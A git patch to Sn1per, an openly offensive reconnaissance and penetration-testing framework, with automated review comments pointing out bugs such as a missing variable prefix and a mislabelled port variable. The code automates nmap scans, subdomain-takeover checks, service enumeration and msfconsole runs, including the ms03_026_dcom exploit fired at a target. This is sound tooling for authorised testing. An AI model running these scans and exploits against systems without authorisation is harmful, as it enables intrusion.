From 5ccf95deeb8ebeaad44e6751002d6aa197a4d2f0 Mon Sep 17 00:00:00 2001 From: WP Engine Marketing Date: Sat, 16 Mar 2019 11:11:31 -0700 Subject: [PATCH] Sn1per Community Edition by @xer0dayz - https://xerosecurity.com --- CHANGELOG.md | 13 ++- README.md | 13 ++- install.sh | 5 +- modes/flyover.sh | 12 ++- modes/fullportonly.sh | 12 +-- modes/fullportscan.sh | 5 +- modes/normal.sh | 169 +++++++++++++++------------------ modes/normal_webporthttp.sh | 161 +------------------------------- modes/normal_webporthttps.sh | 162 +------------------------------- modes/recon.sh | 29 ++++++ modes/stealth.sh | 28 +++++- modes/web_autopwn.sh | 174 ++++++++++++++++++++++++++++++++++ modes/webporthttp.sh | 173 +++------------------------------- modes/webporthttps.sh | 176 +++-------------------------------- sniper | 60 +++++++----- sniper.conf | 9 ++ 16 files changed, 422 insertions(+), 779 deletions(-) create mode 100644 modes/web_autopwn.sh diff --git a/CHANGELOG.md b/CHANGELOG.md index 40ba6dee..35b21ec7 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
@@ -1,8 +1,17 @@ ## CHANGELOG: -* v6.2 - Fixed issue with sniper --list not opening workspace directory -* v6.2 - Added config option to enable/disable subdomain hijacking checks in sniper.conf * v6.2 - Added Glassfish Admin traversal MSF exploit * v6.2 - Added ElasticSearch Java Injection MSF RCE exploit +* v6.2 - Added WebTech web fingerprinting tool +* v6.2 - Added censys subdomain retrieval and API key config +* v6.2 - Added project sonar sub-domain retrieval +* v6.2 - Added command switch to remove workspace (-d) +* v6.2 - Added command switch to remove host (-dh) +* v6.2 - Added DockerFile to run Sn1per in Docker (CC. Hariom Vashisth ) +* v6.2 - Changed option to automatically import all NMap XML's into Metasploit's DB +* v6.2 - Changed option to automatically load Sn1per Professional's report when scans complete +* v6.2 - Added config option to enable/disable subdomain hijacking checks in sniper.conf +* v6.2 - Fixed issue with sniper --list command having invalid reference +* v6.2 - Fixed issue with theharvester not running * v6.1 - Added automated web scanning via Burpsuite Pro 2.x API for all 'web' mode scans * v6.1 - Added Waybackmachine URL retrieval to all web scans * v6.1 - Converted all exploits to Metasploit diff --git a/README.md b/README.md index 133f9e3b..a90c42fe 100644 --- a/README.md +++ b/README.md @@ -84,6 +84,11 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com. ./install.sh ``` +## DOCKER INSTALL: +``` +docker build Dockerfile +``` + ## USAGE: ``` [*] NORMAL MODE @@ -134,6 +139,12 @@ sniper -t|--target [*] LOOT REIMPORT FUNCTION sniper -w --reimport +[*] DELETE WORKSPACE +sniper -w -d + +[*] DELETE HOST FROM WORKSPACE +sniper -w -t -dh + [*] SCAN STATUS sniper --status 
@@ -158,7 +169,7 @@ sniper -u|--update https://gist.github.com/1N3/8214ec2da2c91691bcbc ## LICENSE: -This software is free to distribute, modify and use with the condition that credit is provided to the creator (xer0dayz@XeroSecurity) and is not for commercial use. Permission to distribute any part of the code for sale is strictly prohibited. +This software is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz @XeroSecurity) and is not for commercial use. Permission to distribute any part of the code for sale is strictly prohibited. ## DONATIONS: Donations are welcome. This will help fascilitate improved features, frequent updates and better overall support for sniper. diff --git a/install.sh b/install.sh index 2f7d1bc3..fae3b155 100755 --- a/install.sh +++ b/install.sh @@ -79,8 +79,10 @@ git clone https://github.com/1N3/jexboss.git git clone https://github.com/maurosoria/dirsearch.git git clone https://github.com/jekyc/wig.git git clone https://github.com/rbsec/dnscan.git -git clone https://github.com/nmap/nmap.git +git clone https://github.com/christophetd/censys-subdomain-finder.git +pip install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt +pip install webtech mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR unzip slurp.zip rm -f slurp.zip @@ -94,7 +96,6 @@ cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt 2> /dev/null cd $PLUGINS_DIR/CMSmap/ && pip3 install . && python3 setup.py install -#cd $PLUGINS_DIR/nmap/ && ./configure && make && make install cd $INSTALL_DIR mkdir $LOOT_DIR 2> /dev/null mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null diff --git a/modes/flyover.sh b/modes/flyover.sh index eabf66bd..7f1fedcc 100644 --- a/modes/flyover.sh +++ b/modes/flyover.sh 
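Review bot: The added `pip install webtech` and `pip install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt` lines, together with the unpinned `git clone` of censys-subdomain-finder, install whatever upstream publishes at install time, so two installs of the same Sn1per commit can run different third-party code and an upstream change lands silently. Pin them, e.g. `pip install 'webtech==<PINNED_VERSION>'` and a `git -C $PLUGINS_DIR/censys-subdomain-finder checkout <PINNED_COMMIT>` after the clone, so the plugin set is reproducible and reviewable. The two new lines also use `pip` while the neighbouring dnscan line uses `pip3`; if webtech and the censys requirements target Python 3 this installs into the wrong interpreter, which is worth confirming since the later `webtech -u` calls in modes/*.sh would then fail with their errors hidden by `2> /dev/null`.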
@@ -61,6 +61,7 @@ if [ "$MODE" = "flyover" ]; then dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null & dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null & + dig A +short $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null & wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null @@ -68,6 +69,9 @@ if [ "$MODE" = "flyover" ]; then curl --connect-timeout 3 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null & curl --connect-timeout 3 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null & + webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null & + webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null & + nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null & cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null 
@@ -76,8 +80,8 @@ if [ "$MODE" = "flyover" ]; then /bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null & /bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null & else - cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null & - cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null & + cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null & + cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null & fi echo "$TARGET" >> $LOOT_DIR/scans/updated.txt @@ -90,7 +94,7 @@ if [ "$MODE" = "flyover" ]; then done sort -u $LOOT_DIR/domains/targets.txt 2>/dev/null >> $LOOT_DIR/domains/domains-all-sorted.txt - + sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null sleep 20 rm -f $INSTALL_DIR/wget-log* 2> /dev/null echo -e "$OKRED=====================================================================================$RESET" @@ -117,5 +121,7 @@ if [ "$MODE" = "flyover" ]; then echo "$TARGET" >> $LOOT_DIR/scans/updated.txt done fi + + sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null exit fi \ No newline at end of file diff --git a/modes/fullportonly.sh b/modes/fullportonly.sh index 43ad4fc6..f9d29ac8 100644 --- a/modes/fullportonly.sh +++ b/modes/fullportonly.sh 
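Review bot: The line added in the `@@ -90,7 +94,7 @@` hunk, `sort -u LOOT_DIR/ips/ips-all-unsorted.txt`, is missing the `$` on `LOOT_DIR`, so it reads a relative path that does not exist, the error is discarded by `2> /dev/null`, and `$LOOT_DIR/ips/ips-all-sorted.txt` is truncated to an empty file on every flyover of a single target. The same statement is written correctly in the `@@ -117,5 +121,7 @@` hunk, so this is just a typo: `sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null`. The surrounding `if [ "$MODE" = "flyover" ]` block starts and ends outside this hunk.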
@@ -16,7 +16,7 @@ if [ "$MODE" = "fullportonly" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - args="$args --noreport -m fullportonly" + args="$args --noreport -m fullportonly" echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit 
@@ -25,29 +25,29 @@ if [ "$MODE" = "fullportonly" ]; then logo echo "$TARGET" >> $LOOT_DIR/domains/targets.txt if [ -z "$PORT" ]; then - #nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt - nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml + nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET sed -r "s/ /dev/null > 
$LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null fi diff --git a/modes/fullportscan.sh b/modes/fullportscan.sh index a61aac60..922c939c 100644 --- a/modes/fullportscan.sh +++ b/modes/fullportscan.sh 
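Review bot: In the `else` branch (`-p $PORT` given) the TCP scan now writes `nmap-$TARGET-tcp-port$PORT.xml`, but the following `xsltproc ... $LOOT_DIR/nmap/nmap-$TARGET.xml` still reads the old name and the `cp -f` that the `-z "$PORT"` branch gained is not mirrored here, so the HTML report is built from a stale file or silently skipped. Add `cp -f $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null` after the nmap line, as the first branch does. The UDP scan in the first branch likewise changes its `-oX` name to `nmap-$TARGET-fullport-udp.xml` while the `sed`/`rm` lines below still refer to `nmap-$TARGET-udp`; that pairing predates this commit but the rename makes it worth a look. The enclosing `if [ -z "$PORT" ]` block starts in the previous hunk line and the mode block ends outside the hunk.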
@@ -7,14 +7,15 @@ else echo -e "$OKRED RUNNING FULL PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" #nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt - nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null fi \ No newline at end of file diff --git a/modes/normal.sh b/modes/normal.sh index ae825c31..cddd09f2 100644 --- a/modes/normal.sh +++ b/modes/normal.sh 
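Review bot: `-p $FULL_PORTSCAN_PORTS` is a new dependency on a config value that this hunk does not guard; if it is empty (an existing `~/.sniper.conf` that was not refreshed from the new sniper.conf, which install.sh only copies at install time) the expansion vanishes and nmap takes `$TARGET` as the port list, so the full port scan fails with only a confusing nmap error. Fail fast instead: `-p "${FULL_PORTSCAN_PORTS:?FULL_PORTSCAN_PORTS not set in sniper.conf}"`. The same new expansion appears in the modes/fullportonly.sh hunk `@@ -25,29 +25,29 @@`. The enclosing `else` block starts before this hunk.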
@@ -50,6 +50,7 @@ echo -e "$OKRED GATHERING DNS INFO $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null +dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null dnsenum $TARGET 2> /dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null @@ -135,6 +136,7 @@ port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_8888=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` 
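Review bot: The added `dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt` omits `+short`, so the full dig transcript (header, question section, comments) is appended to a file that flyover.sh's equivalent new line fills with bare addresses via `dig A +short`; the later `sort -u` into ips-all-sorted.txt then carries non-address lines. Make it match flyover: `dig A +short $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null`.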
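Review bot: In the `@@ -135,6 +136,7 @@` hunk the new line assigns the `portid="9200"` match to `port_8888`, not `port_9200`, so it overwrites the real 8888 result on the line above and no `port_9200` variable exists for any later `if [ -z "$port_9200" ]` block to test. Rename the variable: ``port_9200=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` ``.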
@@ -276,9 +278,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING SMTP USER ENUM $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port25.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port25.raw > $LOOT_DIR/output/msf-$TARGET-port25.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port25.raw 2> /dev/null + msfconsole -q -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.raw > $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.raw 2> /dev/null fi fi 
@@ -382,6 +384,12 @@ else wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R -L http://$TARGET | tee $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" 
@@ -431,9 +439,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/nfs/nfsmount; setg RHOSTS \"$TARGET\"; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port111.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port111.raw > $LOOT_DIR/output/msf-$TARGET-port111.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port111.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/nfs/nfsmount; setg RHOSTS \"$TARGET\"; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.raw > $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.raw 2> /dev/null fi if [ "$SHOW_MOUNT" = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" 
@@ -479,9 +487,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/dcerpc/ms03_026_dcom; setg RHOST \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port135.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port135.raw > $LOOT_DIR/output/msf-$TARGET-port135.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port135.raw 2> /dev/null + msfconsole -q -x "use exploit/windows/dcerpc/ms03_026_dcom; setg RHOST \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.raw > $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.raw 2> /dev/null fi fi 
@@ -506,9 +514,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/netbios/nbname; setg RHOSTS $TARGET; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port137.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port137.raw > $LOOT_DIR/output/msf-$TARGET-port137.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port137.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/netbios/nbname; setg RHOSTS $TARGET; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-nbname.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-nbname.raw > $LOOT_DIR/output/msf-$TARGET-nbname.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-nbname.raw 2> /dev/null fi fi 
@@ -557,9 +565,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port161.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port161.raw > $LOOT_DIR/output/msf-$TARGET-port161.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port161.raw 2> /dev/null + msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw > $LOOT_DIR/output/msf-$TARGET-snmp_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw 2> /dev/null fi fi 
@@ -578,9 +586,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port162.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port162.raw > $LOOT_DIR/output/msf-$TARGET-port162.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port162.raw 2> /dev/null + msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw > $LOOT_DIR/output/msf-$TARGET-snmp_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw 2> /dev/null fi fi 
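Review bot: The output names chosen here for port 162 (`msf-$TARGET-snmp_enum.raw` / `.txt`) are identical to the ones the port 161 hunk `@@ -557,9 +565,9 @@` now uses, so when both ports are open the second msfconsole run overwrites the first and the `rm -f` deletes its raw file; the port number was dropped from the filename in both hunks. Keep it, as the other renames in this commit do: `| tee $LOOT_DIR/output/msf-$TARGET-port162-snmp_enum.raw` with the matching `sed` and `rm` paths. The enclosing `if` blocks start and end outside the hunk.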
@@ -632,6 +640,12 @@ else wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R -L https://$TARGET | tee $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" 
